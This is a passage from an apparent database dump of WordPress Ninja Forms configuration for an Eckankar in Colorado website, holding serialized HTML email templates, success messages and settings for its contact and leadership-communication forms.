id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_322},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_322}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_323}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_324}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_327}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:98;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:46:01\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";}s:2:\"id\";i:99;}i:3;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:46:01\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:22:\"Webmaster Contact Form\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:2345:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><h1>Eckankar In Colorado</h1></td><td> </td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello! You have a new \"Webmaster Contact\" form submission.<br /></strong><br /> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the person to receive these web submissions.</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_322}<br /> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_323}<br /> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_324}<br /> </span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong> {field:textbox_326}</span><br /> <br /><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE:<br /></strong>{field:textarea_327}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:100;}}s:8:\"settings\";a:30:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:0;s:5:\"title\";s:22:\"Webmaster Contact Form\";s:10:\"created_at\";s:19:\"2019-07-15 14:08:05\";s:10:\"form_title\";s:22:\"Webmaster Contact Form\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-03-18 03:20:21\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"2\";s:10:\"conditions\";a:0:{}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";i:1;s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:8:\"html_321\";i:1;s:11:\"textbox_322\";i:2;s:12:\"lastname_323\";i:3;s:9:\"email_324\";i:4;s:6:\"hr_325\";i:5;s:11:\"textbox_326\";i:6;s:12:\"textarea_327\";i:7;s:8:\"html_328\";i:8;s:18:\"html_1663800773041\";i:9;s:10:\"submit_330\";}s:17:\"default_label_pos\";s:5:\"above\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(30,'a:4:{s:2:\"id\";i:30;s:6:\"fields\";a:0:{}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:25:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:08\";s:5:\"label\";s:9:\"Save Form\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:9:\"parent_id\";s:2:\"30\";}s:2:\"id\";i:117;}i:1;a:2:{s:8:\"settings\";a:28:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:08\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_59}\";s:13:\"email_subject\";s:38:\"Western Slope Leadership Communication\";s:13:\"email_message\";s:3556:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_57},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Western Slope Leadership Communication team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_57}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_58}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_59}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_60}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_61}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_64}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_65}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"parent_id\";s:2:\"30\";}s:2:\"id\";i:118;}i:2;a:2:{s:8:\"settings\";a:28:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:08\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:347:\"<div style=\"text-align: center\">\r\n\r\n<span style=\"font-size: 14pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span>\r\n\r\nWe appreciate you taking the time to communicate with us.\r\nYour specific request(s) will be forwarded to the selected leader here in Colorado.\r\nYou will then be contacted regarding your submission.\r\n\r\n</div>\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"parent_id\";s:2:\"30\";}s:2:\"id\";i:119;}i:3;a:2:{s:8:\"settings\";a:29:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:43:08\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:38:\"Western Slope Leadership Communication\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3839:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Western Slope Leadership Communications</span> form submission.<br /><br /><br />\r\n</strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Western Slope ECK organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_57} {field:lastname_58}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_57}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_58}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_59}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_60}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_61}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_64}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_65}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";b:0;s:7:\"process\";i:1;s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:9:\"parent_id\";s:2:\"30\";}s:2:\"id\";i:120;}}s:8:\"settings\";a:28:{s:5:\"title\";s:38:\"Western Slope Leadership Communication\";s:10:\"created_at\";s:19:\"2018-01-03 12:07:41\";s:10:\"form_title\";s:38:\"Western Slope Leadership Communication\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:7:\"seq_num\";s:0:\"\";s:12:\"date_updated\";s:19:\"2017-07-04 18:23:18\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"2\";s:8:\"_seq_num\";s:1:\"3\";s:10:\"conditions\";a:0:{}s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:12:{i:0;s:7:\"html_56\";i:1;s:10:\"textbox_57\";i:2;s:11:\"lastname_58\";i:3;s:8:\"email_59\";i:4;s:8:\"phone_60\";i:5;s:13:\"listselect_61\";i:6;s:5:\"hr_62\";i:7;s:7:\"html_63\";i:8;s:13:\"listselect_64\";i:9;s:11:\"textarea_65\";i:10;s:12:\"recaptcha_66\";i:11;s:9:\"submit_67\";}}}',4,0x00),(32,'a:7:{s:2:\"id\";i:32;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:11:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_93\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1248:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and 